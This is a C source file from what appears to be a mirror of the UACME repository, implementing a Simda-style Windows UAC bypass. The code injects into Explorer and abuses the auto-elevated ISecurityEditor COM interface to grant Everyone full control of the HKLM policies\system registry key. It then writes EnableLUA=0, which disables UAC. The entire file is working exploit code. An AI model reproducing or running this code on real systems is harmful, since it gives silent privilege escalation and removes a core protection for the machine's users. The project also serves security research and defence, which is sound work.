Rooba
/
UACME
mirror of https://github.com/hfiref0x/UACME.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity
UACME/Source/Akagi/simda.c

197 lines
4.5 KiB
C
Raw Blame History

/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2015
*
* TITLE: SIMDA.C
*
* VERSION: 1.10
*
* DATE: 28 Mar 2015
*
* Simda based UAC bypass using ISecurityEditor.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#include "global.h"
ELOAD_PARAMETERS_2 g_ElevParams2;
/*
* ucmElevatedDisableProc
*
* Purpose:
*
* Disable UAC using AutoElevated ISecurityEditor.
*
*/
DWORD WINAPI ucmElevatedDisableProc(
PELOAD_PARAMETERS_2 elvpar
)
{
HRESULT r;
BOOL cond = FALSE;
ISecurityEditor *SecurityEditor1 = NULL;
BIND_OPTS3 bop;
LPOLESTR pps;
if (elvpar == NULL) {
return (DWORD)E_FAIL;
}
r = elvpar->xCoInitialize(NULL);
if (r != S_OK) {
return r;
}
RtlSecureZeroMemory(&bop, sizeof(bop));
do {
r = elvpar->xCoCreateInstance(&elvpar->xCLSID_ShellSecurityEditor, NULL,
CLSCTX_INPROC_SERVER | CLSCTX_LOCAL_SERVER | CLSCTX_INPROC_HANDLER,
&elvpar->xIID_ISecurityEditor, &SecurityEditor1);
if (r != S_OK) {
break;
}
if (SecurityEditor1 != NULL)
SecurityEditor1->lpVtbl->Release(SecurityEditor1);
bop.cbStruct = sizeof(bop);
bop.dwClassContext = CLSCTX_LOCAL_SERVER;
r = elvpar->xCoGetObject(elvpar->EleMoniker, (BIND_OPTS *)&bop, &elvpar->xIID_ISecurityEditor, &SecurityEditor1);
if (r != S_OK)
break;
if (SecurityEditor1 == NULL) {
r = E_FAIL;
break;
}
pps = NULL;
r = SecurityEditor1->lpVtbl->GetSecurity(
SecurityEditor1,
elvpar->szKey,
SE_REGISTRY_KEY,
DACL_SECURITY_INFORMATION,
&pps
);
if ((r == S_OK) && (pps != NULL)) {
elvpar->xOutputDebugStringW(pps);
}
r = SecurityEditor1->lpVtbl->SetSecurity(
SecurityEditor1,
elvpar->szKey,
SE_REGISTRY_KEY,
DACL_SECURITY_INFORMATION,
elvpar->szNewSDDL
);
if (r == S_OK) {
elvpar->xOutputDebugStringW(elvpar->szNewSDDL);
}
} while (cond);
if (SecurityEditor1 != NULL)
SecurityEditor1->lpVtbl->Release(SecurityEditor1);
elvpar->xCoUninitialize();
return r;
}
/*
* ucmSimdaTurnOffUac
*
* Purpose:
*
* Disable UAC using AutoElevated undocumented ISecurityEditor interface.
* Used by WinNT/Simda starting from 2010 year till today.
*
*/
BOOL ucmSimdaTurnOffUac(
VOID
)
{
BOOL cond = FALSE, bResult = FALSE;
DWORD dwValue;
LRESULT lRet;
HKEY hKey;
HINSTANCE hKrnl, hOle32, hShell32;
do {
// load/reference required dlls
hKrnl = GetModuleHandle(KERNEL32DLL);
if (hKrnl == NULL) {
//just to shut up mars.
break;
}
hOle32 = GetModuleHandle(OLE32DLL);
if (hOle32 == NULL) {
hOle32 = LoadLibrary(OLE32DLL);
if (hOle32 == NULL) {
break;
}
}
hShell32 = GetModuleHandle(SHELL32DLL);
if (hShell32 == NULL) {
hShell32 = LoadLibrary(SHELL32DLL);
if (hShell32 == NULL) {
break;
}
}
lstrcpyW(g_ElevParams2.EleMoniker, L"Elevation:Administrator!new:{4D111E08-CBF7-4f12-A926-2C7920AF52FC}");
lstrcpyW(g_ElevParams2.szKey, L"MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system");
lstrcpyW(g_ElevParams2.szNewSDDL, L"D:(A;;GA;;;WD)");
if (CLSIDFromString(L"{4D111E08-CBF7-4f12-A926-2C7920AF52FC}",
&g_ElevParams2.xCLSID_ShellSecurityEditor) != NOERROR)
{
break;
}
if (IIDFromString(L"{14B2C619-D07A-46EF-8B62-31B64F3B845C}",
&g_ElevParams2.xIID_ISecurityEditor) != S_OK)
{
break;
}
g_ElevParams2.xCoInitialize = (pfnCoInitialize)GetProcAddress(hOle32, "CoInitialize");
g_ElevParams2.xCoCreateInstance = (pfnCoCreateInstance)GetProcAddress(hOle32, "CoCreateInstance");
g_ElevParams2.xCoGetObject = (pfnCoGetObject)GetProcAddress(hOle32, "CoGetObject");
g_ElevParams2.xCoUninitialize = (pfnCoUninitialize)GetProcAddress(hOle32, "CoUninitialize");
g_ElevParams2.xOutputDebugStringW = (pfnOutputDebugStringW)GetProcAddress(hKrnl, "OutputDebugStringW");
bResult = ucmInjectExplorer(&g_ElevParams2, ucmElevatedDisableProc);
if (bResult) {
Sleep(1000);
lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\policies\\system"),
0, KEY_ALL_ACCESS, &hKey);
if ((lRet == ERROR_SUCCESS) && (hKey != NULL)) {
OutputDebugString(TEXT("[UCM] Key security compromised"));
dwValue = 0;
RegSetValueEx(hKey, TEXT("EnableLUA"), 0, REG_DWORD, (LPBYTE)&dwValue, sizeof(DWORD));
RegCloseKey(hKey);
}
}
} while (cond);
return bResult;
}
Reference in New Issue View Git Blame Copy Permalink